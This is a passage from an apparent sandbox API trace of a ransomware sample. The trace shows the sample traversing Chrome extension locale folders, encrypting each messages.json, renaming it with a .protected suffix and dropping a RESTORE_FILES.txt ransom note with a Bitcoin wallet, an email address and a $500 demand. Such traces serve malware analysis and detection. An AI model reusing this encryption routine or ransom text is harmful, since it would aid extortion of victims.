Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.230] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.230] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.230] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.230] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.231] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.231] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\.") returned 144 [0079.231] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.231] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.231] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.231] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.231] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.231] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.231] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.231] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\..") returned 145 [0079.231] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.231] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.231] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.231] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.231] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.231] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.231] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.231] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.231] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json") returned 156 [0079.231] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.231] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.231] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.231] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.231] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.232] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json") returned 156 [0079.232] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.232] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json") returned 156 [0079.232] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.232] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json") returned 156 [0079.232] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.232] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf3, lpOverlapped=0x0) returned 1 [0079.233] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff0d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.233] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf3, lpOverlapped=0x0) returned 1 [0079.233] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.234] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.234] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.234] CloseHandle (hObject=0x168) returned 1 [0079.234] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.protected") returned 166 [0079.234] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.protected")) returned 1 [0079.235] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.235] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.235] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\RESTORE_FILES.txt") returned 160 [0079.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.235] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.235] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.236] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.236] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.236] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.236] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.236] CloseHandle (hObject=0x164) returned 1 [0079.236] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.236] lstrcmpiW (lpString1="de", lpString2="Windows") returned -1 [0079.237] lstrcmpiW (lpString1="de", lpString2="Program Files") returned -1 [0079.237] lstrcmpiW (lpString1="de", lpString2="Program Files (x86)") returned -1 [0079.237] lstrcmpiW (lpString1="de", lpString2="$Recycle.bin") returned 1 [0079.237] lstrcmpiW (lpString1="de", lpString2="System Volume Information") returned -1 [0079.237] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de") returned 142 [0079.237] lstrcmpW (lpString1="de", lpString2=".") returned 1 [0079.237] lstrcmpW (lpString1="de", lpString2="..") returned 1 [0079.237] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\*") returned 144 [0079.237] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.237] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.237] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.237] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.237] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.237] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.237] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\.") returned 144 [0079.237] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.237] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.237] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.237] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.237] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.237] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.237] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.237] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\..") returned 145 [0079.237] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.237] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.237] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.237] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.238] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.238] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.238] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.238] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.238] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json") returned 156 [0079.238] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.238] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.238] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.238] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.238] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json") returned 156 [0079.238] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.238] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json") returned 156 [0079.238] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.238] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json") returned 156 [0079.238] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.238] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x100, lpOverlapped=0x0) returned 1 [0079.239] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.239] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x100, lpOverlapped=0x0) returned 1 [0079.239] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.239] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.240] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.240] CloseHandle (hObject=0x168) returned 1 [0079.240] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.protected") returned 166 [0079.240] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.protected")) returned 1 [0079.241] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.241] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.241] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\RESTORE_FILES.txt") returned 160 [0079.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.241] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.241] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.242] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.242] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.242] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.242] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.242] CloseHandle (hObject=0x164) returned 1 [0079.242] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.243] lstrcmpiW (lpString1="el", lpString2="Windows") returned -1 [0079.243] lstrcmpiW (lpString1="el", lpString2="Program Files") returned -1 [0079.243] lstrcmpiW (lpString1="el", lpString2="Program Files (x86)") returned -1 [0079.243] lstrcmpiW (lpString1="el", lpString2="$Recycle.bin") returned 1 [0079.243] lstrcmpiW (lpString1="el", lpString2="System Volume Information") returned -1 [0079.243] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el") returned 142 [0079.243] lstrcmpW (lpString1="el", lpString2=".") returned 1 [0079.243] lstrcmpW (lpString1="el", lpString2="..") returned 1 [0079.243] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\*") returned 144 [0079.243] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.243] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.243] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.243] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.243] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.243] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.243] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\.") returned 144 [0079.243] 